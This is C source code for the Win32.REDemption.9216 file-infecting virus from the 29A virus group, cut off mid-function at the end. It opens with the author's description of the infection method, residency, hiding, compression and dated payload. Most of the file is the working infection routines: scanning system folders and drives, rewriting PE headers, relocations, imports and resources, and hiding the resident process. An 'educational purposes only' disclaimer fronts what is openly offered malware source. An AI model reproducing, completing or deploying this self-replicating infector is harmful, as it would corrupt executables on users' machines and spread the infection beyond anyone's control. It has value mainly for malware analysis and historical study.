????????????????????????????????????????????????????????????????[win32red.c]?? /* Win32.REDemption.9216 virus. (c) 1998. Jacky Qwerty/29A. Description This is a resident HLL (High Level Language) Win32 appender virus written in C. It infects all sort of EXE files: DOS EXE files, NE files, PE files from Win32 (Win95/NT), etc. Infected files only spread in Win32 platforms, including Win3.x with Win32s subsystem. The virus infects EXE files by changing the pointer at 3Ch in the MZ header which points to the new EXE header (if any) placing another pointer to the virus own PE header attached at the end of the file. When the virus executes, it infects all EXE files from Windows, System and current folder. Then it spawns itself as another task (thus staying resident), makes itself invisible (thus becoming unloadable) and periodically searches for non- infected EXE files in all drives, infecting them in the background. Most interesting feature of this virus is that infected files don't grow at all, that is, files have same size before and after infection. The virus compresses part of its host by using own JQCODING algorithm. It also copies host icon to its own resource section to show original icon. The virus has no problems related to finding the KERNEL32 base address and its API functions. This is because all API functions are imported implicitly from the virus own import table. The virus takes special care of patching appropriately all RVA and RAW fields from its own PE header, including code, data, imports, relocations and resource sections. This is needed for the virus to spread succesfully through all kinds of hosts. Payload On October the 29th, the virus replaces the main icon of all infected programs with its own icon, a 29A logo. It also changes default desktop wallpaper to such logo. To build Just run the BUILD.BAT file to build release version. VC++ 6.0 compiler was used since it proved to optimize better than Borland's or Watcom's. Greets go to All 29Aers..... for all the work quality and effort during this #3 issue, keep up the good work dudes! b0z0........... for such invaluable feedback during betatesting, thanks a lot man, you rock! My gf Carol.... who's been pushing me to quit the scene, but still not enough, i.o.u. #8). Rajaat/Sandy... Hey we all miss you.. come back to 29A! Disclaimer This source code is provided for educational purposes only. The author is NOT responsible in any way, for problems it may cause due to improper use! (c) 1998. Jacky Qwerty/29A. */ #define WIN32_LEAN_AND_MEAN #include #ifdef tsr #include "win95sys.h" #endif #ifdef compr #include "jqcoding.h" #endif #ifdef icon #include "winicons.h" #include "winres.h" #endif //constants.. #ifdef _MSC_VER // Microsoft VC++ # ifdef release # define DATA_SECTION_RAW 0x200 //0xE00 # else # define DATA_SECTION_RAW 0x1400 //0x1600 # endif # define COMPILER_DATA 0 //0x30 (VC++4) # define SIZEOF_RESOURCE_DATA 0x504 #endif #ifdef __BORLANDC__ // Borland C++ # ifdef release # define DATA_SECTION_RAW ? //0x1000 # define COMPILER_DATA 0 # else # define DATA_SECTION_RAW ? //0x6200 # define COMPILER_DATA 0x74 # endif # define SIZEOF_RESOURCE_DATA ? #endif #define VIRUS_SIZE (FILE_SIZE - PE_HEADER_OFFSET) #define STARTOF_CODEDATA (DATA_SECTION_RAW + COMPILER_DATA -\ PE_HEADER_OFFSET) #define RawSelfCheck (STARTOF_CODEDATA + sizeof(szCopyright) - 5) #define INIT_VARS_OFFSET (STARTOF_CODEDATA + sizeof(szCopyright) +\ sizeof(szExts) + 3 & -4) #ifdef tsr #define RawProgType INIT_VARS_OFFSET #define RawSrcVir (RawProgType + 4) #else #define RawSrcVir INIT_VARS_OFFSET #endif #define RawOldPtr2NewEXE (RawSrcVir + 4) #define RawOldFileSize (RawOldPtr2NewEXE + 4) #ifdef compr #define RawnComprSize (RawOldFileSize + 4) #define RawCipherTarget (RawnComprSize + 4) #define TmpVal RawCipherTarget #else #define TmpVal RawOldFileSize #endif #ifdef icon #define RawOldResourceAddr (TmpVal + 4) #endif #ifndef compr #define SIZE_PAD 101 #endif #define READ_ONLY FALSE #define WRITE_ACCESS TRUE #define SIZEOF_FILEEXT 3 #define MAX_FILESIZE 0x4000000 //64 MB #ifdef compr #define MIN_FILESIZE 0x4000 //16 KB #endif #define PREV_LAPSE 3 //1 * 60 //10 * 60 //seconds #define SEEK_LAPSE 3 //5 //30 //seconds //macros.. #define Rva2Ptr(Type, Base, RVA) ((Type)((DWORD)(Base) + (DWORD)(RVA))) #define IsFile(pFindData) (!((pFindData)->dwFileAttributes &\ FILE_ATTRIBUTE_DIRECTORY)) #define IsFolder(pFindData) (!IsFile(pFindData) &&\ (pFindData)->cFileName[0] != '.') #define PushVar(Object) __asm push (Object) #define PopVar(Object) __asm pop (Object) //type definitions.. #ifdef tsr typedef BYTE PROG_TYPE, *PPROG_TYPE; #define TSR_COPY 0 #define HOST_COPY 1 #endif typedef BYTE BOOLB; typedef struct _IMAGE_RELOCATION_DATA { // not defined in winnt.h WORD RelocOffset :12; WORD RelocType :4; } IMAGE_RELOCATION_DATA, *PIMAGE_RELOCATION_DATA; #ifdef icon typedef struct _ICONIMAGES { PICONIMAGE pLargeIcon; PICONIMAGE pSmallIcon; } ICONIMAGES, *PICONIMAGES; #endif //global variables.. BYTE szCopyright[] = "(c) Win32.REDemption (C ver.1.0) by JQwerty/29A", szExts[] = "eXeSCr"; #ifdef tsr PROG_TYPE ProgType = HOST_COPY; #endif DWORD SrcVir = PE_HEADER_OFFSET, OldPtr2NewEXE = 1, OldFileSize = FILE_SIZE; #ifdef compr DWORD nComprSize = 1, CipherTarget = 1; #endif #ifdef icon DWORD OldResourceAddr = RESOURCE_SECTION_RVA; #include "jq29aico.h" #endif DWORD ExitCode = 0; #ifndef compr DWORD _TgtVir; #else DWORD CipherSource; #endif DWORD _RvaDelta; HANDLE hHandle1, hHandle2; BYTE PathName[MAX_PATH], HostName[MAX_PATH], TmpName[MAX_PATH]; WIN32_FIND_DATA FindData, FindDataTSR; STARTUPINFO StartupInfo = { 0 }; PROCESS_INFORMATION ProcessInfo; PIMAGE_DOS_HEADER pMZ, pHostMZ; PIMAGE_NT_HEADERS _pHostPE; #ifdef msgbox BOOLB CancelFolderSeek = FALSE, CancelFileSeek = FALSE; #ifdef tsr HANDLE hMutex; #endif #endif #ifdef icon BOOLB bPayLoadDay = FALSE; PIMAGE_RESOURCE_DIRECTORY pRsrcStart; BYTE HostLargeIcon[SIZEOF_LARGE_ICON]; BYTE HostSmallIcon[SIZEOF_SMALL_ICON]; #endif #ifdef compr BYTE ComprMem[0x10000]; #ifdef icon #define SIZEOF_BMP 0x8076 //32Kb + Bitmap header.. BYTE jq29aBmp[SIZEOF_BMP] = { 0 }; #endif #endif #define sz29A (szCopyright + sizeof(szCopyright) - 4) #define szJQ (szCopyright + sizeof(szCopyright) - 12) //function declarations.. VOID Win32Red(VOID); BOOLB OpenMapFile(PBYTE FileName, BOOLB WriteAccess); VOID CloseTruncFile(BOOLB WriteAccess); VOID InfectPath(PBYTE PathName, DWORD cBytes); VOID CloseUnmapFile(BOOLB WriteAccess); PBYTE GetEndOfPath(PBYTE pTgt, PBYTE pSr); PVOID Rva2Raw(DWORD Rva); #ifdef icon VOID FixResources(PIMAGE_RESOURCE_DIRECTORY pRsrcDir); VOID GetDefaultIcons(PICONIMAGES pIconImages, PVOID pNEorPE); #endif #ifdef tsr VOID ExecTemp(PROG_TYPE ProgType); __inline VOID SeekTSR(VOID); VOID WalkFolder(PBYTE PathName); VOID HideProcess(VOID); __inline PPROCESS_DATABASE GetProcessDB(VOID); __inline PTHREAD_DATABASE GetThreadDB(VOID); #else __inline VOID ExecTemp(VOID); #endif //function definitions.. VOID Win32Red() { #ifdef tsr #ifndef msgbox HANDLE hMutex; #endif HideProcess(); #endif #ifdef icon #include "payload.c" #endif if (GetModuleFileName(0, HostName, MAX_PATH) && OpenMapFile(HostName, READ_ONLY)) { pHostMZ = pMZ; PushVar(hHandle1); //better pushin/popin than usin a temp. var. PushVar(hHandle2); //better pushin/popin than usin a temp. var. SrcVir += (DWORD)pMZ; #ifdef tsr if (ProgType != TSR_COPY) { #ifdef msgbox MessageBox(NULL, "Non-resident stage..", szCopyright, MB_OK); #endif #endif #ifdef compr PushVar(nComprSize); PushVar(CipherTarget); #endif InfectPath(PathName, GetWindowsDirectory(PathName, 0x7F)); InfectPath(PathName, GetSystemDirectory(PathName, 0x7F)); InfectPath(PathName, (*PathName = '.', 1)); #ifdef compr PopVar(CipherTarget); PopVar(nComprSize); #endif #ifdef tsr } else { if ((hMutex = CreateMutex(NULL, FALSE, szJQ))) if (GetLastError() == ERROR_ALREADY_EXISTS) #if 1 #ifdef msgbox MessageBox(NULL, "TSR: Mutex exists!", szCopyright, MB_OK), #endif #endif CloseHandle(hMutex), ExitProcess(ExitCode); #if 1 #ifdef msgbox else MessageBox(NULL, "TSR: Mutex created!", szCopyright, MB_OK); #endif #endif #ifdef msgbox MessageBox(NULL, "Resident stage..", szCopyright, MB_OK); #endif SeekTSR(); #ifdef msgbox MessageBox(NULL, "TSR: bye bye..", szCopyright, MB_OK); #endif } #endif PopVar(hHandle2); //better pushin/popin than usin a temp. var. PopVar(hHandle1); //better pushin/popin than usin a temp. var. pMZ = pHostMZ; CloseUnmapFile(READ_ONLY); #ifdef tsr if (ProgType != TSR_COPY) { if ((hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, szJQ))) #ifndef msgbox CloseHandle(hMutex); #else CloseHandle(hMutex), MessageBox(NULL, "HOST: Mutex exists!", szCopyright, MB_OK); #endif else if (GetTempPath(MAX_PATH, PathName) - 1 < MAX_PATH - 1) #ifdef msgbox MessageBox(NULL, "HOST: Mutex doesn't exist!", szCopyright, MB_OK), #endif ExecTemp(TSR_COPY); GetEndOfPath(PathName, HostName); ExecTemp(HOST_COPY); } #else GetEndOfPath(PathName, HostName); ExecTemp(); #endif } ExitProcess(ExitCode); } #ifdef tsr VOID ExecTemp(PROG_TYPE ProgType) { #else __inline VOID ExecTemp() { #endif PBYTE pSrc, szCmdLine; HANDLE hFindFile; #ifdef compr BOOLB DecomprOK = TRUE; #endif #ifdef tsr DWORD cBytes; if (ProgType == TSR_COPY) { if (PathName[(cBytes = lstrlen(PathName)) - 1] != '\\') PathName[cBytes++] = '\\'; *(PDWORD)(PathName + cBytes) = '*A92'; *(PDWORD)(PathName + cBytes + 4) = '*.'; if ((hFindFile = FindFirstFile(PathName, &FindData)) != INVALID_HANDLE_VALUE) { do { lstrcpy(PathName + cBytes, FindData.cFileName); DeleteFile(PathName); } while (FindNextFile(hFindFile, &FindData)); FindClose(hFindFile); } PathName[cBytes] = '\x0'; } #endif if (!(cBytes = lstrlen(PathName), GetTempFileName(PathName, sz29A, 0, PathName)) && (GetTempPath(MAX_PATH, PathName) - 1 >= MAX_PATH - 1 || !(cBytes = lstrlen(PathName), GetTempFileName(PathName, sz29A, 0, PathName)))) return; if (ProgType != TSR_COPY) for (;;) { pSrc = PathName + lstrlen(lstrcpy(TmpName, PathName)); while (*--pSrc != '.'); *(PDWORD)(pSrc + 1) = 'EXE'; if (MoveFile(TmpName, PathName)) break; DeleteFile(TmpName); PathName[cBytes] = '\x0'; if (!GetTempFileName(PathName, sz29A, 0, PathName)) return; } if (CopyFile(HostName, PathName, FALSE) && SetFileAttributes(PathName, FILE_ATTRIBUTE_NORMAL) && (hFindFile = FindFirstFile(HostName, &FindData)) != INVALID_HANDLE_VALUE) { if (OpenMapFile(PathName, WRITE_ACCESS)) { #ifdef tsr if (ProgType != TSR_COPY) { #endif pMZ->e_lfanew = OldPtr2NewEXE; #ifndef compr FindData.nFileSizeLow = OldFileSize; #else #ifdef msgbox #if 0 MessageBox(NULL, "Host decoding is about to start..", szCopyright, MB_OK); #endif #endif if (jq_decode(Rva2Ptr(PBYTE, pMZ, OldFileSize), Rva2Ptr(PBYTE, pMZ, CipherTarget + nComprSize), nComprSize, ComprMem) != OldFileSize - CipherTarget) { DecomprOK = FALSE; #ifdef msgbox #if 1 MessageBox(NULL, "Decode error: File is corrupt!", szCopyright, MB_OK); #endif #if 0 } else { MessageBox(NULL, "Host decoded succesfully!", szCopyright, MB_OK); #endif #endif } #endif #ifdef tsr } else *Rva2Ptr(PPROG_TYPE, Rva2Ptr(PIMAGE_NT_HEADERS, pMZ, pMZ->e_lfanew), RawProgType) = TSR_COPY; #endif #ifndef compr UnmapViewOfFile(pMZ); CloseTruncFile(WRITE_ACCESS); #else CloseUnmapFile(WRITE_ACCESS); if (DecomprOK) { #endif pSrc = GetCommandLine(); while (*++pSrc != 0x20 && *pSrc); if ((szCmdLine = (PBYTE)GlobalAlloc(LPTR, MAX_PATH + lstrlen(pSrc) + 1))) { lstrcat(lstrcpy(szCmdLine, PathName), pSrc); (BYTE)StartupInfo.cb = sizeof(STARTUPINFO); if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInfo)) { #ifdef tsr if (ProgType != TSR_COPY) { #endif WaitForSingleObject(ProcessInfo.hProcess, INFINITE); GetExitCodeProcess(ProcessInfo.hProcess, &ExitCode); CloseHandle(ProcessInfo.hThread); CloseHandle(ProcessInfo.hProcess); #ifdef tsr } #endif } GlobalFree(szCmdLine); } #ifdef compr } #endif } FindClose(hFindFile); } DeleteFile(PathName); } BOOLB OpenMapFile(PBYTE FileName, BOOLB WriteAccess) { #ifndef compr DWORD NewFileSize; #endif hHandle1 = CreateFile(FileName, WriteAccess ? GENERIC_READ | GENERIC_WRITE : GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if (hHandle1 == INVALID_HANDLE_VALUE) return FALSE; hHandle2 = CreateFileMapping(hHandle1, NULL, WriteAccess ? PAGE_READWRITE : PAGE_READONLY, 0, #ifdef compr 0, #else WriteAccess ? NewFileSize = (((_TgtVir = (FindData.nFileSizeLow + 0x1FF & -0x200) + PE_HEADER_OFFSET) + (VIRUS_SIZE + SIZE_PAD - 1)) / SIZE_PAD) * SIZE_PAD : 0, #endif NULL); if (!hHandle2) { CloseHandle(hHandle1); return FALSE; } pMZ = MapViewOfFile(hHandle2, WriteAccess ? FILE_MAP_WRITE : FILE_MAP_READ, 0, 0, #ifdef compr 0 #else WriteAccess ? NewFileSize : 0 #endif ); if (!pMZ) { CloseTruncFile(WriteAccess); return FALSE; } return TRUE; } VOID CloseTruncFile(BOOLB WriteAccess) { CloseHandle(hHandle2); if (WriteAccess) { #ifndef compr SetFilePointer(hHandle1, FindData.nFileSizeLow, NULL, FILE_BEGIN); SetEndOfFile(hHandle1); #endif SetFileTime(hHandle1, NULL, NULL, &FindData.ftLastWriteTime); } CloseHandle(hHandle1); } VOID InfectPath(PBYTE PathName, DWORD cBytes) { PBYTE pSrc, pTgt, pExt, pEndRelocs, pRelocBase; #ifdef compr PBYTE pComprBuf; SYSTEMTIME SystemTime; #endif DWORD FileExt, TgtVir, RvaDelta, RawDelta, nCount, nSections, nRvas; PIMAGE_SECTION_HEADER pSectionHdr; PIMAGE_NT_HEADERS pPE, pHostPE; PIMAGE_BASE_RELOCATION pRelocs; PIMAGE_RELOCATION_DATA pRelocData; PIMAGE_IMPORT_DESCRIPTOR pImports; PIMAGE_THUNK_DATA pImportData; HANDLE hFindFile; BOOLB Infect, bValidHeader; #ifdef icon ICONIMAGES IconImages; #endif if (0x7F <= cBytes - 1) return; if (PathName[cBytes - 1] != '\\') PathName[cBytes++] = '\\'; *(PDWORD)(PathName + cBytes) = '*.*'; #ifdef msgbox switch (MessageBox(NULL, PathName, szCopyright, MB_YESNOCANCEL | MB_ICONEXCLAMATION)) { case IDCANCEL: CancelFolderSeek = TRUE; case IDNO: return; } #endif if ((hFindFile = FindFirstFile(PathName, &FindData)) == INVALID_HANDLE_VALUE) return; do { { #ifdef compr BYTE KeySecond, TmpKeySec; #endif if (!IsFile(&FindData) || FindData.nFileSizeHigh || #ifdef compr FindData.nFileSizeLow < MIN_FILESIZE || #endif (FindData.nFileSizeLow & -MAX_FILESIZE) || #ifndef compr !(FindData.nFileSizeLow % SIZE_PAD) #else (FileTimeToSystemTime(&FindData.ftLastWriteTime, &SystemTime), TmpKeySec = (BYTE)(((BYTE)SystemTime.wYear - (BYTE)SystemTime.wMonth + (BYTE)SystemTime.wDay - (BYTE)SystemTime.wHour + (BYTE)SystemTime.wMinute ^ 0x6A) & 0x3E), KeySecond = TmpKeySec < 60 ? TmpKeySec : TmpKeySec - 4, KeySecond == (BYTE)SystemTime.wSecond) #endif ) continue; #ifdef compr (BYTE)SystemTime.wSecond = KeySecond; #endif } pTgt = lstrcpy(PathName + cBytes, FindData.cFileName) + lstrlen(FindData.cFileName); FileExt = *(PDWORD)(pTgt - SIZEOF_FILEEXT) & ~0xFF202020; pExt = szExts; do { if (FileExt != (*(PDWORD)pExt & ~0xFF202020) || pTgt[- 1 - SIZEOF_FILEEXT] != '.' || !OpenMapFile(PathName, READ_ONLY)) continue; Infect = FALSE; #ifdef compr pComprBuf = NULL; #endif if (pMZ->e_magic == IMAGE_DOS_SIGNATURE) { bValidHeader = FALSE; pPE = Rva2Ptr(PIMAGE_NT_HEADERS, pMZ, pMZ->e_lfanew); if ((DWORD)pMZ < (DWORD)pPE && (DWORD)pPE < Rva2Ptr(DWORD, pMZ, FindData.nFileSizeLow) - 0x7F && (bValidHeader = TRUE, pPE->Signature == IMAGE_NT_SIGNATURE && *Rva2Ptr(PDWORD, pPE, RawSelfCheck) == 'A92/')) { } else { #ifndef compr Infect = TRUE; #else { DWORD nMaxComprSize; if ((pComprBuf = (PBYTE)GlobalAlloc( LPTR, nMaxComprSize = FindData.nFileSizeLow / 8 * 9 + 12 ) )) { #ifdef msgbox #if 0 MessageBox(NULL, "Host encoding is about to start..", FindData.cFileName, MB_OK); #endif #endif nComprSize = jq_encode(pComprBuf + nMaxComprSize, Rva2Ptr(PBYTE, pMZ, FindData.nFileSizeLow), FindData.nFileSizeLow - sizeof(IMAGE_DOS_HEADER), ComprMem); TgtVir = (CipherTarget + nComprSize - PE_HEADER_OFFSET + 0x1FF & -0x200) + PE_HEADER_OFFSET; if (TgtVir + VIRUS_SIZE - 1 < FindData.nFileSizeLow) #ifdef msgbox #if 0 MessageBox(NULL, "Host encoded succesfully!", FindData.cFileName, MB_OK), #endif #endif Infect = TRUE; #ifdef msgbox #if 0 else MessageBox(NULL, "Host encoded succesfully, but " "Win32.RED code didn't fit, " "skipping file..", FindData.cFileName, MB_OK); #endif #endif } } #endif } } CloseUnmapFile(READ_ONLY); if (!Infect || !SetFileAttributes(PathName, FILE_ATTRIBUTE_NORMAL)) { #ifdef compr if (pComprBuf) GlobalFree(pComprBuf); #endif continue; } #ifdef msgbox switch (MessageBox(NULL, PathName, szCopyright, MB_YESNOCANCEL | MB_ICONEXCLAMATION)) { case IDCANCEL: CancelFileSeek = TRUE; break; case IDYES: #endif if (OpenMapFile(PathName, WRITE_ACCESS)) { #ifdef icon IconImages.pLargeIcon = NULL; IconImages.pSmallIcon = NULL; if (!bPayLoadDay && bValidHeader) { GetDefaultIcons(&IconImages, Rva2Ptr(PVOID, pMZ, pMZ->e_lfanew)); if (IconImages.pLargeIcon) { pSrc = (PBYTE)IconImages.pLargeIcon; pTgt = HostLargeIcon; nCount = SIZEOF_LARGE_ICON; do *pTgt++ = *pSrc++; while (--nCount); if (IconImages.pSmallIcon) { pSrc = (PBYTE)IconImages.pSmallIcon; nCount = SIZEOF_SMALL_ICON; do *pTgt++ = *pSrc++; while (--nCount); } } } #endif #ifdef compr pTgt = Rva2Ptr(PBYTE, pMZ, CipherTarget); pSrc = (PBYTE)CipherSource; nCount = nComprSize; do *pTgt++ = *pSrc++; while (--nCount); GlobalFree(pComprBuf); pComprBuf = NULL; //This line is optional _pHostPE = pHostPE = Rva2Ptr(PIMAGE_NT_HEADERS, pMZ, TgtVir); #else _pHostPE = pHostPE = Rva2Ptr(PIMAGE_NT_HEADERS, //The comented code pMZ, // below generates TgtVir = _TgtVir); // more bytez than #endif // this code becoz pTgt = (PBYTE)pHostPE; // the linker adds pSrc = (PBYTE)SrcVir; // other functionz nCount = VIRUS_SIZE; // not needed! do *pTgt++ = *pSrc++; while (--nCount); // // CopyMemory((PBYTE)(pHostPE = Rva2Ptr(PIMAGE_NT_HEADERS, //Not in // pMZ, //any DLL // TgtVir)), //but in // (PBYTE)SrcVir, //a RTL. // VIRUS_SIZE); // #ifdef tsr if (ProgType == TSR_COPY) *Rva2Ptr(PPROG_TYPE, pHostPE, RawProgType) = HOST_COPY; #endif *Rva2Ptr(PDWORD, pHostPE, RawSrcVir) = TgtVir; *Rva2Ptr(PDWORD, pHostPE, RawOldPtr2NewEXE) = pMZ->e_lfanew; *Rva2Ptr(PDWORD, pHostPE, RawOldFileSize) = FindData.nFileSizeLow; #ifdef compr *Rva2Ptr(PDWORD, pHostPE, RawnComprSize) = nComprSize; *Rva2Ptr(PDWORD, pHostPE, RawCipherTarget) = CipherTarget; #endif _RvaDelta = RvaDelta = ((pHostPE->OptionalHeader.SizeOfHeaders += (RawDelta = TgtVir - pHostMZ->e_lfanew)) + 0xFFF & -0x1000) - pHostPE->OptionalHeader.BaseOfCode; // fix RVAs in PE header.. pHostPE->OptionalHeader.AddressOfEntryPoint += RvaDelta; pHostPE->OptionalHeader.BaseOfCode += RvaDelta; pHostPE->OptionalHeader.BaseOfData += RvaDelta; pSectionHdr = IMAGE_FIRST_SECTION(pHostPE); nSections = pHostPE->FileHeader.NumberOfSections; do { pSectionHdr->PointerToRawData += RawDelta; pSectionHdr++->VirtualAddress += RvaDelta; } while (--nSections); pHostPE->OptionalHeader.SizeOfImage = (pSectionHdr - 1)->VirtualAddress + (pSectionHdr - 1)->Misc.VirtualSize + 0xFFF & -0x1000; nRvas = pHostPE->OptionalHeader.NumberOfRvaAndSizes; do { if (!pHostPE->OptionalHeader.DataDirectory[--nRvas]. VirtualAddress) continue; pHostPE->OptionalHeader.DataDirectory[nRvas]. VirtualAddress += RvaDelta; } while (nRvas); // fix RVAs in code & reloc section.. pEndRelocs = Rva2Ptr( PBYTE, (pRelocs = Rva2Raw(pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]. VirtualAddress)), pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]. Size - IMAGE_SIZEOF_BASE_RELOCATION); do { pRelocBase = Rva2Raw(pRelocs->VirtualAddress += RvaDelta); pRelocData = (PIMAGE_RELOCATION_DATA)(pRelocs + 1); (DWORD)pRelocs += pRelocs->SizeOfBlock; do { if (pRelocData->RelocType != IMAGE_REL_BASED_HIGHLOW) continue; *Rva2Ptr(PDWORD, pRelocBase, pRelocData->RelocOffset) += RvaDelta; } while ((DWORD)++pRelocData < (DWORD)pRelocs); } while ((DWORD)pRelocs < (DWORD)pEndRelocs); // fix RVAs in import section.. pImports = Rva2Raw(pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]. VirtualAddress); do { pImportData = #ifdef _MSC_VER Rva2Raw((DWORD)pImports->OriginalFirstThunk += RvaDelta); #endif #ifdef __BORLANDC__ Rva2Raw((DWORD)pImports->u.OriginalFirstThunk += RvaDelta); #endif if ((DWORD)pImportData) do { (DWORD)pImportData->u1.AddressOfData += RvaDelta; } while ((DWORD)(++pImportData)->u1.AddressOfData); pImports->Name += RvaDelta; pImportData = Rva2Raw((DWORD)pImports->FirstThunk += RvaDelta); do { (DWORD)pImportData->u1.AddressOfData += RvaDelta; } while ((DWORD)(++pImportData)->u1.AddressOfData); } while((++pImports)->Name); #ifdef icon // fix RVAs in resource section.. pRsrcStart = Rva2Raw(pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE]. VirtualAddress = (*Rva2Ptr(PDWORD, pHostPE, RawOldResourceAddr) += RvaDelta)); ((PBYTE)pRsrcStart)[0x2E] = 2; ((PBYTE)pRsrcStart)[0x4E4] = 2; FixResources(pRsrcStart); if (IconImages.pLargeIcon || bPayLoadDay) { pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE]. Size = SIZEOF_RESOURCE_DATA; pTgt = (PBYTE)pRsrcStart + 0xD0; pSrc = HostLargeIcon; nCount = SIZEOF_LARGE_ICON; do *pTgt++ = *pSrc++; while (--nCount); if (IconImages.pSmallIcon || bPayLoadDay) { nCount = SIZEOF_SMALL_ICON; do *pTgt++ = *pSrc++; while (--nCount); } else { ((PBYTE)pRsrcStart)[0x2E] = 1; ((PBYTE)pRsrcStart)[0x4E4] = 1; } } else { pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE]. VirtualAddress = 0; pHostPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE]. Size = 0; } #endif pMZ->e_lfanew = TgtVir; #ifdef compr SystemTimeToFileTime(&SystemTime, &FindData.ftLastWriteTime); #endif CloseUnmapFile(WRITE_ACCESS); } #ifdef msgbox } #endif SetFileAttributes(PathName, FindData.dwFileAttributes); #ifdef msgbox if (CancelFileSeek) { CancelFileSeek = FALSE; goto BreakHere; //can't use break; because of the 2 while's. } #endif #ifdef compr if (pComprBuf) GlobalFree(pComprBuf); #endif } while (*(pExt += SIZEOF_FILEEXT)); } while (FindNextFile(hFindFile, &FindData)); #ifdef msgbox BreakHere: #endif FindClose(hFindFile); } VOID CloseUnmapFile(BOOLB WriteAccess) { UnmapViewOfFile(pMZ); #ifndef compr CloseHandle(hHandle2); if (WriteAccess) SetFileTime(hHandle1, NULL, NULL, &FindData.ftLastWriteTime); CloseHandle(hHandle1); #else CloseTruncFile(WriteAccess); #endif } PBYTE GetEndOfPath(PBYTE pTgt, PBYTE pSr) { PBYTE pTgtBegin = pTgt, pSrEnd = pSr; while (*pSrEnd++); while (pSr < --pSrEnd && pSrEnd[-1] != '\\' && pSrEnd[-1] != ':'); while (pSr < pSrEnd) *pTgt++ = *pSr++; if (pTgtBegin == pTgt || pTgt[-1] != '\\') *((PWORD)pTgt)++ = '.\\'; *pTgt = '\x0'; return(pTgt); } PVOID Rva2Raw(DWORD Rva) { PIMAGE_SECTION_HEADER pSectionHdr = IMAGE_FIRST_SECTION(_pHostPE); DWORD nSections = _pHostPE->FileHeader.NumberOfSections; do { if (pSectionHdr->VirtualAddress <= Rva && Rva < pSectionHdr->VirtualAddress + pSectionHdr->Misc.VirtualSize) return (PVOID)(Rva - pSectionHdr->VirtualAddress + pSectionHdr->PointerToRawData + (DWORD)pMZ); pSectionHdr++; } while (--nSections); return NULL; } #ifdef icon VOID FixResources(PIMAGE_RESOURCE_DIRECTORY pRsrcDir) { PIMAGE_RESOURCE_DIRECTORY_ENTRY pRsrcDirEntry; DWORD nCount; if (!pRsrcDir) return; pRsrcDirEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)(pRsrcDir + 1); nCount = pRsrcDir->NumberOfNamedEntries + pRsrcDir->NumberOfIdEntries; do pRsrcDirEntry->DataIsDirectory ? FixResources(Rva2Ptr(PIMAGE_RESOURCE_DIRECTORY, //recursion.. pRsrcStart, pRsrcDirEntry->OffsetToDirectory)) : (Rva2Ptr(PIMAGE_RESOURCE_DATA_ENTRY, pRsrcStart, pRsrcDirEntry->OffsetToData)->OffsetToData += _RvaDelta); while (pRsrcDirEntry++, --nCount); } #define LARGE_ICON 0 #define SMALL_ICON 1 PICONIMAGE GetDefaultIcon(PIMAGE_RESOURCE_DIRECTORY pRsrcDir, BOOLB IconType, BOOLB bFalse) { PIMAGE_RESOURCE_DIRECTORY_ENTRY pRsrcDirEntry; PIMAGE_RESOURCE_DATA_ENTRY pRsrcDataEntry; PICONIMAGE pIconImage; DWORD nCount; if (!pRsrcDir) return NULL; pRsrcDirEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)(pRsrcDir + 1); nCount = pRsrcDir->NumberOfNamedEntries + pRsrcDir->NumberOfIdEntries; do { if (!bFalse && pRsrcDirEntry->Id != (WORD)RT_ICON) continue; if (pRsrcDirEntry->DataIsDirectory) { pIconImage = GetDefaultIcon(Rva2Ptr(PIMAGE_RESOURCE_DIRECTORY, pRsrcStart, pRsrcDirEntry->OffsetToDirectory), IconType, TRUE); if (!pIconImage) continue; return pIconImage; } pRsrcDataEntry = Rva2Ptr(PIMAGE_RESOURCE_DATA_ENTRY, pRsrcStart, pRsrcDirEntry->OffsetToData); pIconImage = Rva2Raw(pRsrcDataEntry->OffsetToData); if (pIconImage->icHeader.biSize != sizeof(BITMAPINFOHEADER) || pIconImage->icHeader.biWidth != (IconType == LARGE_ICON ? 32 : 16) || pIconImage->icHeader.biHeight != (IconType == LARGE_ICON ? 64 : 32) || pIconImage->icHeader.biPlanes != 1 || pIconImage->icHeader.biBitCount != 4) continue; return pIconImage; } while (++pRsrcDirEntry, --nCount); return NULL; } VOID GetDefaultIcons(PICONIMAGES pIconImages, PVOID pNEorPE) { if (((PIMAGE_NT_HEADERS)pNEorPE)->Signature == IMAGE_NT_SIGNATURE) { PIMAGE_NT_HEADERS pPE = _pHostPE = (PIMAGE_NT_HEADERS)pNEorPE; PIMAGE_RESOURCE_DIRECTORY pRsrcDir = pRsrcStart = Rva2Raw(pPE->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE]. VirtualAddress); pIconImages->pLargeIcon = GetDefaultIcon(pRsrcDir, LARGE_ICON, FALSE); pIconImages->pSmallIcon = GetDefaultIcon(pRsrcDir, SMALL_ICON, FALSE); return; } if (((PIMAGE_OS2_HEADER)pNEorPE)->ne_magic == IMAGE_OS2_SIGNATURE) { PIMAGE_OS2_HEADER pNE = (PIMAGE_OS2_HEADER)pNEorPE; BYTE align = *Rva2Ptr(PBYTE, pNE, pNE->ne_rsrctab); PRESOURCE_TYPE pRsrcType = Rva2Ptr(PRESOURCE_TYPE, pNE, pNE->ne_rsrctab + 2), pRsrcEnd = Rva2Ptr(PRESOURCE_TYPE, pNE, pNE->ne_restab); while (pRsrcType < pRsrcEnd && pRsrcType->ID) { if (pRsrcType->ID == (0x8000 | (WORD)RT_ICON)) { PRESOURCE_INFO pRsrcInfo = (PRESOURCE_INFO)(pRsrcType + 1); DWORD nCount = 0; do { PICONIMAGE pIconImage = Rva2Ptr(PICONIMAGE, pMZ, pRsrcInfo++->offset << align); if (pIconImage->icHeader.biSize 